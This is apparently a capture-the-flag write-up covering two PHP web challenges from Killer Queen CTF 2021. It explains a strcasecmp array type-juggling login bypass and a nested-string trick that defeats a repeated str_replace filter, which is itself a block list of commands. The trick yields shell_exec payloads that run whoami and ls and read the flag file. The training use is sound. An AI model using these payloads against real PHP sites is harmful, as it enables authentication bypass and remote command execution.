[Killer Queen CTF 2021](https://ctftime.org/event/1482)

# [Killer Queen CTF 2021](https://ctftime.org/event/1482) ###### tags: `ctf` {%hackmd theme-dark %} # Web ### `Just Not My Type` ![](https://i.imgur.com/7mPR9DM.jpg) - Challenge Description => Simple login page ![](https://i.imgur.com/9jZMWng.jpg) - Source code: ```php= <h1>I just don't think we're compatible</h1> <?php $FLAG = "shhhh you don't get to see this locally"; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $password = $_POST["password"]; if (strcasecmp($password, $FLAG) == 0) { echo $FLAG; } else { echo "That's the wrong password!"; } } ?> <form method="POST"> Password <input type="password" name="password"> <input type="submit"> </form> ``` - Vulnerability: - Turned out that `strcasecmp` in php will return 0 (values are the same) thus bypassing the check point when the parameter is an array - The reason is because `strcasecmp` cannot deal with arrays. If a user pass `password[]=123456`, it will return NULL. And the comparsion for `NULL` and `0` results in 0 (e.g. NULL == 0 ==> true) ![](https://i.imgur.com/RnTTaaP.jpg) - BurpSuite to send the payload ![](https://i.imgur.com/btBqIgP.jpg) - We can even send variables without initializing values => Just send `password[]` ![](https://i.imgur.com/fG7mUZo.jpg) - Got the flag: `flag{no_way!_i_took_the_flag_out_of_the_source_before_giving_it_to_you_how_is_this_possible}` ## Resources for first challenge: - [CSAW-2012-Web](http://int03.blogspot.com/2012/10/csaw-2012-ctf-web-600-write-up.html) - [PHP Vulnerable functions](https://www.chabug.org/ctf/417.html) - [NULL == 0 return True in PHP](https://stackoverflow.com/a/8236390/12349124) # Web ### ` PHat Pottomed Girls ` - Challenge Descriptions ![](https://i.imgur.com/wLeoz2M.jpg) - Challenge Source code ```php= <?php session_start(); function generateRandomString($length = 15) { $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } return $randomString; } function filter($originalstring) { $notetoadd = str_replace("<?php", "", $originalstring); $notetoadd = str_replace("?>", "", $notetoadd); $notetoadd = str_replace("<?", "", $notetoadd); $notetoadd = str_replace("flag", "", $notetoadd); $notetoadd = str_replace("fopen", "", $notetoadd); $notetoadd = str_replace("fread", "", $notetoadd); $notetoadd = str_replace("file_get_contents", "", $notetoadd); $notetoadd = str_replace("fgets", "", $notetoadd); $notetoadd = str_replace("cat", "", $notetoadd); $notetoadd = str_replace("strings", "", $notetoadd); $notetoadd = str_replace("less", "", $notetoadd); $notetoadd = str_replace("more", "", $notetoadd); $notetoadd = str_replace("head", "", $notetoadd); $notetoadd = str_replace("tail", "", $notetoadd); $notetoadd = str_replace("dd", "", $notetoadd); $notetoadd = str_replace("cut", "", $notetoadd); $notetoadd = str_replace("grep", "", $notetoadd); $notetoadd = str_replace("tac", "", $notetoadd); $notetoadd = str_replace("awk", "", $notetoadd); $notetoadd = str_replace("sed", "", $notetoadd); $notetoadd = str_replace("read", "", $notetoadd); $notetoadd = str_replace("system", "", $notetoadd); return $notetoadd; } if(isset($_POST["notewrite"])) { $newnote = $_POST["notewrite"]; //3rd times the charm and I've learned my lesson. Now I'll make sure to filter more than once :) $notetoadd = filter($newnote); $notetoadd = filter($notetoadd); $notetoadd = filter($notetoadd); $filename = generateRandomString(); array_push($_SESSION["notes"], "$filename.php"); file_put_contents("$filename.php", $notetoadd); header("location:index.php"); } ?> ``` - Challenge Entry ![](https://i.imgur.com/7K9nO5Y.png) - Analysis => find vulnerability at `str_replace()`: - Although there exists filter to filter specifc command - We can easily bypass `str_replace()` by reconstructing the string one by one word thus leads to command injections (e.g. if `cat` is filtered for once, the if we construct a word `c`cat`a`cat`t`cat, when cat is filtered, `cat` will remain and we can utilize this vulnerability to construct our payload) - Payload: - `<<<<???? phpinfo(); ????>>>>` - Result: ![](https://i.imgur.com/Wf8JUSK.jpg) - Payload: - `<<<<???? echo shell_exec('whoami'); ????>>>>` - Result: ![](https://i.imgur.com/TMPaf5Y.jpg) - Payload: - `<<<<???? echo shell_exec('ls -lart'); ????>>>>` - Result: ![](https://i.imgur.com/S7TboLk.jpg) - Payload: - `<<<<???? echo shell_exec('ccccatatatat /fffflaglaglaglag.php'); ????>>>>` - Result: flag: `flag{wait_but_i_fixed_it_after_my_last_two_blunders_i_even_filtered_three_times_:(((}` ![](https://i.imgur.com/NWY85w6.jpg) ## Resources for challenge 2 [PHP execute commands](https://www.php.net/manual/en/function.shell-exec.php) [str_replace() tricks](https://github.com/m3ssap0/CTF-Writeups/blob/master/35C3%20Junior%20CTF/flags/README.md) [str_replace() tricks 2](https://jbz.team/turinctf2017/turinctf) # Result - I solved two challeges, and all of us solved 9 challenges ![](https://i.imgur.com/k7s83OX.png)